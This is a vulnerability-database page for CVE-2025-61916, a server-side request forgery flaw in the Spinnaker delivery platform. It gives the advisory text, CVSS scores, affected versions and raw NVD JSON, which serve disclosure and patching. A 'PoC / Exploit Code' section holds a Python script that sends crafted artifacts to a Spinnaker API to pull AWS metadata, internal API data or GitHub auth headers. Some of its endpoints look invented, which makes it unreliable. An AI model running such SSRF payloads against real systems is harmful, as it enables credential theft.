Security Vulnerability Report
中文
CVE-2025-61916 CVSS 7.9 HIGH

CVE-2025-61916

Published: 2026-01-05 22:15:51
Last Modified: 2026-02-23 19:19:06

Description

Spinnaker is an open source, multi-cloud continuous delivery platform. Versions prior to 2025.1.6, 2025.2.3, and 2025.3.0 are vulnerable to server-side request forgery. The primary impact is allowing users to fetch data from a remote URL. This data can be then injected into spinnaker pipelines via helm or other methods to extract things LIKE idmsv1 authentication data. This also includes calling internal spinnaker API's via a get and similar endpoints. Further, depending upon the artifact in question, auth data may be exposed to arbitrary endpoints (e.g. GitHub auth headers) leading to credentials exposure. To trigger this, a spinnaker installation MUST have two things. The first is an artifact enabled that allows user input. This includes GitHub file artifacts, BitBucket, GitLab, HTTP artifacts and similar artifact providers. JUST enabling the http artifact provider will add a "no-auth" http provider that could be used to extract link local data (e.g. AWS Metadata information). The second is a system that can consume the output of these artifacts. e.g. Rosco helm can use this to fetch values data. K8s account manifests if the API returns JSON can be used to inject that data into the pipeline itself though the pipeline would fail. This vulnerability is fixed in versions 2025.1.6, 2025.2.3, and 2025.3.0. As a workaround, disable HTTP account types that allow user input of a given URL. This is probably not feasible in most cases. Git, Docker and other artifact account types with explicit URL configurations bypass this limitation and should be safe as they limit artifact URL loading. Alternatively, use one of the various vendors which provide OPA policies to restrict pipelines from accessing or saving a pipeline with invalid URLs.

CVSS Details

CVSS Score
7.9
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:spinnaker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:linuxfoundation:spinnaker:*:*:*:*:*:*:*:* - VULNERABLE
Spinnaker < 2025.1.6
Spinnaker < 2025.2.3
Spinnaker < 2025.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61916 PoC - Spinnaker SSRF Exploitation # This PoC demonstrates how to exploit the SSRF vulnerability in Spinnaker # to fetch AWS metadata or internal API data import requests import json # Configuration SPINNAKER_API = "https://target-spinnaker.example.com" ATTACKER_CONTROLLED_URL = "http://169.254.169.254/latest/meta-data/" def exploit_ssrf(): """ Exploit Spinnaker SSRF to fetch AWS metadata Requires artifact provider with user input URL enabled """ # Step 1: Create a malicious HTTP artifact with SSRF payload malicious_artifact = { "type": "http", "reference": "https://internal-spinnaker-api/spinnaker-api/v2/pipelines", "name": "malicious-artifact" } # Step 2: Alternative payload - AWS metadata extraction aws_metadata_artifact = { "type": "http", "reference": ATTACKER_CONTROLLED_URL, "name": "aws-metadata-artifact" } # Step 3: GitHub auth header extraction github_auth_artifact = { "type": "github/file", "reference": "https://internal-git-api.github.com/repos/secret/repo/contents/config", "name": "github-auth-artifact" } # Send malicious artifact to Spinnaker endpoint = f"{SPINNAKER_API}/artifacts/fetch" payload = { "account": "http-artifact-account", "artifact": malicious_artifact, "version": "latest" } try: response = requests.post(endpoint, json=payload, timeout=30) if response.status_code == 200: print("[+] SSRF Exploit Successful!") print(f"[+] Fetched Data: {response.text[:500]}") return response.text except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print("CVE-2025-61916 Spinnaker SSRF PoC") print("=" * 50) exploit_ssrf()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61916", "sourceIdentifier": "[email protected]", "published": "2026-01-05T22:15:50.610", "lastModified": "2026-02-23T19:19:06.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spinnaker is an open source, multi-cloud continuous delivery platform. Versions prior to 2025.1.6, 2025.2.3, and 2025.3.0 are vulnerable to server-side request forgery. The primary impact is allowing users to fetch data from a remote URL. This data can be then injected into spinnaker pipelines via helm or other methods to extract things LIKE idmsv1 authentication data. This also includes calling internal spinnaker API's via a get and similar endpoints. Further, depending upon the artifact in question, auth data may be exposed to arbitrary endpoints (e.g. GitHub auth headers) leading to credentials exposure. To trigger this, a spinnaker installation MUST have two things. The first is an artifact enabled that allows user input. This includes GitHub file artifacts, BitBucket, GitLab, HTTP artifacts and similar artifact providers. JUST enabling the http artifact provider will add a \"no-auth\" http provider that could be used to extract link local data (e.g. AWS Metadata information). The second is a system that can consume the output of these artifacts. e.g. Rosco helm can use this to fetch values data. K8s account manifests if the API returns JSON can be used to inject that data into the pipeline itself though the pipeline would fail. This vulnerability is fixed in versions 2025.1.6, 2025.2.3, and 2025.3.0. As a workaround, disable HTTP account types that allow user input of a given URL. This is probably not feasible in most cases. Git, Docker and other artifact account types with explicit URL configurations bypass this limitation and should be safe as they limit artifact URL loading. Alternatively, use one of the various vendors which provide OPA policies to restrict pipelines from accessing or saving a pipeline with invalid URLs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L", "baseScore": 7.9, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.0, "impactScore": 5.3}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-523"}, {"lang": "en", "value": "CWE-918"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:spinnaker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.1.6", "matchCriteriaId": "8C912D47-66A6-40EC-95BF-1091831BC7CF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:spinnaker:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.2.0", "versionEndExcluding": "2025.2.3", "matchCriteriaId": "4CAFD7A8-67A1-4E45-99CE-6FA31FA378B2"}]}]}], "references": [{"url": "https://github.com/spinnaker/spinnaker/security/advisories/GHSA-vrjc-q2fh-6x9h", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}